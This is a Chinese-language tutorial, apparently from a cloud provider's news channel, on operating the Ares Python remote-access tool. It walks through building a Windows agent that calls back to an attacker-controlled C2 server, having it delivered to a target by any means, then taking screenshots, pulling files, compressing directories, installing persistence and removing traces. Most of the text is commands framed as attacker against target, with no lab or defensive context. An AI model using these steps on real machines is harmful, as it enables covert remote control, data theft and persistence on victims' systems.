Python中如何使用Ares這個工具

小編給大家分享一下Python中如何使用Ares這個工具，相信大部分人都還不怎么了解，因此分享這篇文章給大家參考一下，希望大家閱讀完這篇文章后大有收獲，下面讓我們一起去了解一下吧！

安裝

首先，我們需要在攻擊者機器上安裝該工具。我們直接從GitHub克隆它。完成后，我們通過cd命令遍歷新創(chuàng)建的名為Ares的目錄，如下所示。

git clone //github.com/sweetsoftware/Ares.git
cd Ares
ls

接下來，為了使工具可以正常工作，我們還需要安裝一些依賴項。安裝requirements.txt文件即可，該文件包含了需要安裝的python庫的詳細信息。

pip install -r requirements.txt

因為我們的目標是Windows機器，因此我們需要編譯與Windows機器兼容的agent。為此，我們需要先來安裝wine。這里可能需要花費一些時間。

ls
./wine_setup.sh

目標利用

至此，我們已成功安裝了運行Ares所需的所有條件。接下來我們就可以來嘗試獲取與目標機器的CNC會話了。想要達到這個目的，我們還需要一個agent。我們使用cd命令遍歷agent目錄。然后通過ls命令列出文件，找到其中的一個配置文件。我們需要編輯該文件以獲取會話。

cd agent/
ls
nano config.py

可以看到，當我們使用nano命令打開配置文件后，其中的SERVER變量處有一個IP地址。我們編輯并將其更改為攻擊者機器的內(nèi)網(wǎng)IP地址，這里以我的IP（192.168.1.4）為例。其他參數(shù)值我們無需修改，保存并退出nano編輯器。

config文件配置完成后，下面我們來創(chuàng)建一個代理。因為我們的目標機器是Windows，所以我們將使用以下命令創(chuàng)建一個Windows的代理。

./builder.py -p Windows –server //192.168.1.4:8080 -o agent.exe

創(chuàng)建完成后你可以選擇一種你喜歡的方式，將這個代理發(fā)送到目標計算機上。之后，我們需要啟動服務(wù)器。這是必需的，因為代理將與該服務(wù)器通信。讓我們回到Ares目錄。這里有一個名為server的子目錄。在遍歷它之后，我們需要初始化數(shù)據(jù)庫（僅在第一次使用時需要初始化數(shù)據(jù)庫），因為我們將使用initdb參數(shù)?，F(xiàn)在，我們將運行服務(wù)器如下圖所示。

ls
cd server/
./ares.py initdb
./ares.py runserver -h 0.0.0.0 -p 8080 --threaded

現(xiàn)在，我們在瀏覽器中導(dǎo)航到服務(wù)器IP。你將看到一個表單，要求我們設(shè)置一個密碼。輸入完成后，單擊“ Define”繼續(xù)。

接著，會要求我們輸入剛剛設(shè)置的密碼進行登錄。

這里我們可以看到Ares GUI的幾個主索引，包括：Change Password，Disconnect，Agent List?，F(xiàn)在，讓我們回到創(chuàng)建代理的那步。只有在目標機器上執(zhí)行代理后，我們才會在Agent List中獲得一個Agent。

正如下圖中所示，我們有一個存活的agent。我們可以看到代理的名稱，狀態(tài)，代理上線時登錄的用戶，同樣我們也有主機名。我們還獲取到了目標的IP和系統(tǒng)類型。這里，我們可以在多個設(shè)備上運行代理，每個設(shè)備都可以在這里被查看到。我們可以從這里選擇會話，同時在多個會話上執(zhí)行相同的命令。讓我們點擊名稱繼續(xù)。

命令執(zhí)行

讓我們先來運行一個systeminfo命令看看。如下所示，我們獲取到了目標機器的所有系統(tǒng)配置信息。

systeminfo

截屏

現(xiàn)在，讓我們來嘗試截取目標機器的屏幕。輸入屏幕截取命令，代理將捕獲屏幕截圖并提供如圖所示的鏈接。打開該鏈接，我們就可以查看到最新的屏幕截圖。

screenshot

文件下載

我們還可以使用該代理從遠程目標下載文件。想要下載文件必須要知道文件名，我們可以使用dir命令獲取文件名。知道文件名后，我們就可以將相應(yīng)的文件下載到我們本地的攻擊機上，如下圖所示。

download file.txt

壓縮文件

我們可以使用Ares agent壓縮遠程目標上的目錄。同樣需要目錄名。提取目錄名后，我們可以使用以下命令遠程壓縮文件。這里的'sample'是目錄的名稱，'compressed.zip'是壓縮文件的名稱。

zip compressed.zip sample

持久化代理

我們可以使用persist命令來調(diào)用代理中的persistence。該命令會在遠程目標上安裝代理。

persist

Clean Up

最后任務(wù)完成后，我們可以使用clean命令從目標計算機中刪除代理。

clean

以上是“Python中如何使用Ares這個工具”這篇文章的所有內(nèi)容，感謝各位的閱讀！相信大家都有了一定的了解，希望分享的內(nèi)容對大家有所幫助，如果還想學(xué)習(xí)更多知識，歡迎關(guān)注億速云行業(yè)資訊頻道！